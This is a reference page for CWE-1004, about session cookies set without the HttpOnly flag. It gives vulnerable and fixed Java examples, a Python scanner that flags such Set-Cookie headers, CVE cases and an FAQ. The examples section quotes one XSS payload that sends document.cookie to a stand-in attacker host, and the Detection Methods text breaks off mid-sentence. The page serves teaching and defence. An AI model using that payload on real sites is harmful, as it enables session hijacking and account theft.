
CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag

CWE-1004 · Variant Level · 4 CVEs · 1 Mitigation

Description

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

Potential Impact

Confidentiality

Read Application Data

Integrity

Gain Privileges or Assume Identity

Demonstrative Examples

In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

The snippet of code below establishes a new cookie to hold the session ID.

Bad (Java):

    String sessionID = generateSessionId();
    Cookie c = new Cookie("session_id", sessionID);
    // HttpOnly is never set, so page scripts can read this cookie via document.cookie
    response.addCookie(c);

The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:

Attack (JavaScript):

    document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie + '">');

When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.

To mitigate the risk, use the setHttpOnly(true) method.

Good (Java):

    String sessionID = generateSessionId();
    Cookie c = new Cookie("session_id", sessionID);
    c.setHttpOnly(true);   // browser withholds the cookie from document.cookie and other script APIs
    response.addCookie(c);

Mitigations & Prevention

Phase: Implementation · Effectiveness: High

Leverage the HttpOnly flag when setting a sensitive cookie in a response.

Detection Methods

  • Automated Static Analysis (Effectiveness: High): Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then sea
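SAST finds the missing setHttpOnly(true) call in source; the same weakness can also be checked at runtime by inspecting the Set-Cookie headers a deployed application actually emits. The following is an added example, not code from the CWE entry: it parses Set-Cookie header values and reports sensitive-looking cookies that lack the HttpOnly attribute. The name heuristic (SENSITIVE_NAME_PATTERN) and the sample headers are constructed for the demonstration.

```python
"""Flag sensitive cookies set without HttpOnly (CWE-1004) in HTTP response headers.

Added example for this CWE entry, not the entry's own code. The sensitive-name
heuristic and the sample headers are assumptions constructed for the demo.
"""
import re
from typing import Dict, List, NamedTuple

# Assumed heuristic: cookie names that usually carry session or auth state.
SENSITIVE_NAME_PATTERN = re.compile(r"(sess|sid|auth|token|jwt|login)", re.IGNORECASE)


class ParsedCookie(NamedTuple):
    name: str
    value: str
    attrs: Dict[str, str]  # lower-cased attribute name -> value ("" for flags like HttpOnly)


def parse_set_cookie(header_value: str) -> ParsedCookie:
    """Split one Set-Cookie header value into the cookie pair and its attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return ParsedCookie(name.strip(), value.strip(), attrs)


def find_cwe1004(set_cookie_headers: List[str]) -> List[str]:
    """Return the names of sensitive-looking cookies that were set without HttpOnly."""
    findings = []
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header)
        if not SENSITIVE_NAME_PATTERN.search(cookie.name):
            continue  # not a session/auth cookie by our heuristic
        if "httponly" not in cookie.attrs:
            findings.append(cookie.name)
    return findings


# Constructed sample headers, as a server might emit them in one response.
SAMPLE_HEADERS = [
    "session_id=abc123; Path=/",                               # bad: sensitive, no HttpOnly
    "auth_token=xyz; Path=/; Secure; HttpOnly; SameSite=Lax",  # good
    "theme=dark; Path=/",                                      # not sensitive, ignored
    "JSESSIONID=deadbeef; Path=/; Secure",                     # bad: Secure alone is not enough
]

if __name__ == "__main__":
    for name in find_cwe1004(SAMPLE_HEADERS):
        print(f"CWE-1004: cookie {name!r} set without HttpOnly")
```

In practice, feed the function the Set-Cookie values captured from the login and session-refresh responses of the application under test.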

Real-World CVE Examples

CVE ID          Description
CVE-2024-47833  Python library for ML and data science does not use the HTTPOnly security attribute for session cookies.
CVE-2022-24045  Web application for a room automation system has client-side JavaScript that sets a sensitive cookie without the HTTPOnly security attribute, allowing the cookie to be accessed.
CVE-2014-3852   CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.
CVE-2015-4138   Appliance for managing encrypted communications does not use the HttpOnly flag.

Frequently Asked Questions

What is CWE-1004?

CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) is a software weakness identified by MITRE's Common Weakness Enumeration. It is classified as a Variant-level weakness. The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

How can CWE-1004 be exploited?

Attackers can exploit CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) to read application data. This weakness is typically introduced during the Implementation phase of software development.

How do I prevent CWE-1004?

Key mitigations include: Leverage the HttpOnly flag when setting a sensitive cookie in a response.

What is the severity of CWE-1004?

CWE-1004 is classified as a Variant-level weakness (Low-Medium abstraction). It has been observed in 4 real-world CVEs.